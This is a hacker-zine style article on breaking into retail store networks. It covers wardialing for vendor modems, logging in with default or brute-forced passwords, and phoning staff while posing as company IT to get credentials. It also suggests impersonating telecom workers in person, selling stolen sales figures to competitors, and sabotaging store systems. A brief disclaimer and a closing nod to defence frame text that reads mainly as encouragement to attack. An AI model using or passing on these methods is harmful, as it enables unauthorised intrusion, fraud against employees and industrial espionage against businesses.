Shopping for a Security Flaw? Try Retail
by dead_pilgrim
Author's Note: System vulnerabilities described in this article should be used for the sole purpose of improving and fortifying weak systems, and not to inflict harm, steal, or act in any other malicious fashion.
Within the past few months I have discovered that there are serious security holes within retail store systems and networks. The flaws range from open modem ports to computer ignorant employees. All of which could give you the keys to the kingdom.
Let's take a look at open modems, or modems that are set up for service by vendors or the tech support staff of the company.
These modems are installed with most systems. They are often set up when the store first opens, or when the network is first built. After that, the modems are lucky to ever receive use. You can use a wardial program like PhoneSweep to harvest modem numbers. Then you can determine whether you can connect to a retail store's system. Within a three hour sweep, I found eight modems connected to various retail systems, all of which accepted incoming transmissions!
What can you do with these modems?
Well, one could download a program called ZOC (this program, as well as PhoneSweep are available from download.com, Kazaa, or eMule). This program is very useful in this situation. It allows you to connect to the modem by dial-up and emulate a number of different systems. Many retail systems use Telnet or TTY. Again, you can fumble around with the program to see what works the best.
Many major retailers use HP 9000 or IBM servers powered by UNIX or NT. They usually use Cisco routers (models 2600 or 2500 are usually standard issue). You would think that a smart business would use a firewall, right? Not usually. Seven out of the eight systems that I found during the wardial session were not protected by a firewall. The most common method of protection was a username and password.
Passwords on these systems usually require a username or password. One could use a brute-force attack, dictionary attack, or just try to guess the default password.
That's right! Many systems still have the default usernames and passwords set. If you search within Google Groups you can more than likely find a list of the default passwords. If these do not work one could always use social engineering to obtain a username and password. Some companies have in store employees that perform updates on these systems, and they are familiar with the passwords. Or you might try to get a system password from a regular sales associate.
A majority of these employees are computer illiterate. You could easily call the store stating that you were with the company's IT department, ask to speak with someone that might handle the store's computer system, and engineer a password from them. Retail stores usually do not hire in house techs.
Retail store networks and servers contain a literal cornucopia of information ranging from sales information to server access. I'm sure that the competition would be very interested in sales figures, movement of product, or some new marketing idea that the company is about to deploy. This is where it hurts the most. Most companies work hard to keep sales figures under lock and key, and it's sadly ironic that someone could possibly access this sensitive information from the comfort of their own home.
Sometimes you can also gain access to the store's PBX system.
The most common PBX system used in retailers is the Lucent Definity series. The operation manuals for the Lucent PBX systems are available from Lucent's website in PDF format. If you read these manuals, you will find that there are all kinds of awesome things that you can do with these systems. I'm going to save this subject for a later article.
Granted that not every hacker is interested in the sales figures or marketing information of the local Shoe Emporium, but someone could make a cool amount of cash selling this information.
As long as there is competition there will always be a market for this kind of industrial espionage. f they were not interested in selling this information, they could always create some serious havoc, such as removing network devices or changing store system passwords.
I wonder if I put on a Verizon, SBC, or AT&T shirt and hat (which you could probably find at your local Salvation Army), walked in to the local super shopping center, and asked to see the store's network or telephone system, how far I would actually get. Since most of these people are improperly trained, I'm sure I could infiltrate the system very easily.
Most of these store systems are designed and set up by very inexperienced system architects, which makes the perfect environment for security holes. Perhaps they should start thinking on the defensive. What self-respecting corporation would allow themselves to be brought to their knees by some hacker that found an extremely obvious security hole?